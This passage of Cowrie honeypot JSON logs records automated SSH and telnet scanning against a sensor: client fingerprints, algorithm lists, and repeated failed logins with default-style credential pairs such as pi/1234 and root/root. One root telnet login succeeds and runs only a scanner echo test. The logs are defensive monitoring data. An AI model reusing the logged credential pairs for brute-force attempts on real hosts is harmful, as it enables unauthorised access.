om","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:09.044173Z","src_ip":"87.120.191.13","session":"309194da76ab"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234","message":"login attempt [pi/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:09.486879Z","src_ip":"87.120.191.13","session":"309194da76ab"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:10.508844Z","src_ip":"87.120.191.13","session":"309194da76ab"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":58036,"dst_ip":"1.2.3.4","dst_port":22,"session":"fed0655d0933","protocol":"ssh","message":"New connection: 87.120.191.13:58036 (1.2.3.4:22) [session: fed0655d0933]","sensor":"my-vps","timestamp":"2025-08-26T13:59:10.528841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:10.530217Z","src_ip":"87.120.191.13","session":"fed0655d0933"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:10.552361Z","src_ip":"87.120.191.13","session":"fed0655d0933"}
{"eventid":"cowrie.login.failed","username":"pi","password":"brigante","message":"login attempt [pi/brigante] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:10.614963Z","src_ip":"87.120.191.13","session":"fed0655d0933"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:11.638372Z","src_ip":"87.120.191.13","session":"fed0655d0933"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":58072,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b5052fec281","protocol":"ssh","message":"New connection: 87.120.191.13:58072 (1.2.3.4:22) [session: 7b5052fec281]","sensor":"my-vps","timestamp":"2025-08-26T13:59:11.659474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:11.660283Z","src_ip":"87.120.191.13","session":"7b5052fec281"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:11.682574Z","src_ip":"87.120.191.13","session":"7b5052fec281"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":52848,"dst_ip":"1.2.3.4","dst_port":23,"session":"d8a65e92666c","protocol":"telnet","message":"New connection: 139.59.27.234:52848 (1.2.3.4:23) [session: d8a65e92666c]","sensor":"my-vps","timestamp":"2025-08-26T13:59:11.712434Z"}
{"eventid":"cowrie.login.failed","username":"pi","password":"samar","message":"login attempt [pi/samar] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:11.769778Z","src_ip":"87.120.191.13","session":"7b5052fec281"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:12.327223Z","src_ip":"139.59.27.234","session":"d8a65e92666c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:12.836922Z","src_ip":"87.120.191.13","session":"7b5052fec281"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":58090,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4ac7da02d28","protocol":"ssh","message":"New connection: 87.120.191.13:58090 (1.2.3.4:22) [session: e4ac7da02d28]","sensor":"my-vps","timestamp":"2025-08-26T13:59:12.866122Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:12.900288Z","src_ip":"87.120.191.13","session":"e4ac7da02d28"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:12.901239Z","src_ip":"87.120.191.13","session":"e4ac7da02d28"}
{"eventid":"cowrie.login.failed","username":"pi","password":"12345","message":"login attempt [pi/12345] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:13.111053Z","src_ip":"87.120.191.13","session":"e4ac7da02d28"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:14.191425Z","src_ip":"87.120.191.13","session":"e4ac7da02d28"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":56604,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9114ec295f0","protocol":"ssh","message":"New connection: 87.120.191.13:56604 (1.2.3.4:22) [session: b9114ec295f0]","sensor":"my-vps","timestamp":"2025-08-26T13:59:14.214020Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:14.281186Z","src_ip":"87.120.191.13","session":"b9114ec295f0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:14.281853Z","src_ip":"87.120.191.13","session":"b9114ec295f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53848,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca80ccbfd0f5","protocol":"ssh","message":"New connection: 212.227.125.160:53848 (1.2.3.4:22) [session: ca80ccbfd0f5]","sensor":"my-vps","timestamp":"2025-08-26T13:59:14.479126Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:59:14.483588Z","src_ip":"212.227.125.160","session":"ca80ccbfd0f5"}
{"eventid":"cowrie.login.failed","username":"pi","password":"nimda","message":"login attempt [pi/nimda] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:14.537314Z","src_ip":"87.120.191.13","session":"b9114ec295f0"}
{"eventid":"cowrie.session.closed","duration":3.2700328826904297,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:14.982422Z","src_ip":"139.59.27.234","session":"d8a65e92666c"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.27.234","src_port":60816,"dst_ip":"1.2.3.4","dst_port":23,"session":"e7d7accda4f3","protocol":"telnet","message":"New connection: 139.59.27.234:60816 (1.2.3.4:23) [session: e7d7accda4f3]","sensor":"my-vps","timestamp":"2025-08-26T13:59:15.237237Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:15.602870Z","src_ip":"87.120.191.13","session":"b9114ec295f0"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":56618,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bf26d580efe","protocol":"ssh","message":"New connection: 87.120.191.13:56618 (1.2.3.4:22) [session: 2bf26d580efe]","sensor":"my-vps","timestamp":"2025-08-26T13:59:15.625119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:15.653132Z","src_ip":"87.120.191.13","session":"2bf26d580efe"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:15.653876Z","src_ip":"87.120.191.13","session":"2bf26d580efe"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:59:15.697133Z","src_ip":"212.227.125.160","session":"ca80ccbfd0f5"}
{"eventid":"cowrie.login.failed","username":"pi","password":"11","message":"login attempt [pi/11] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:15.875588Z","src_ip":"87.120.191.13","session":"2bf26d580efe"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:59:15.916373Z","src_ip":"139.59.27.234","session":"e7d7accda4f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:59:15.997476Z","src_ip":"139.59.27.234","session":"e7d7accda4f3"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T13:59:16.293921Z","src_ip":"139.59.27.234","session":"e7d7accda4f3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:16.587179Z","src_ip":"212.227.125.160","session":"ca80ccbfd0f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53820,"dst_ip":"1.2.3.4","dst_port":22,"session":"77f89dfb96e7","protocol":"ssh","message":"New connection: 212.227.125.160:53820 (1.2.3.4:22) [session: 77f89dfb96e7]","sensor":"my-vps","timestamp":"2025-08-26T13:59:16.809213Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:16.976153Z","src_ip":"87.120.191.13","session":"2bf26d580efe"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":56622,"dst_ip":"1.2.3.4","dst_port":22,"session":"a4fba35f425f","protocol":"ssh","message":"New connection: 87.120.191.13:56622 (1.2.3.4:22) [session: a4fba35f425f]","sensor":"my-vps","timestamp":"2025-08-26T13:59:17.008181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:17.074584Z","src_ip":"87.120.191.13","session":"a4fba35f425f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:17.075475Z","src_ip":"87.120.191.13","session":"a4fba35f425f"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin1234","message":"login attempt [pi/admin1234] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:17.350008Z","src_ip":"87.120.191.13","session":"a4fba35f425f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"2.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:18.631580Z","src_ip":"139.59.27.234","session":"e7d7accda4f3"}
{"eventid":"cowrie.session.closed","duration":3.398723602294922,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:18.635887Z","src_ip":"139.59.27.234","session":"e7d7accda4f3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:59:20.811106Z","src_ip":"212.227.125.160","session":"77f89dfb96e7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh 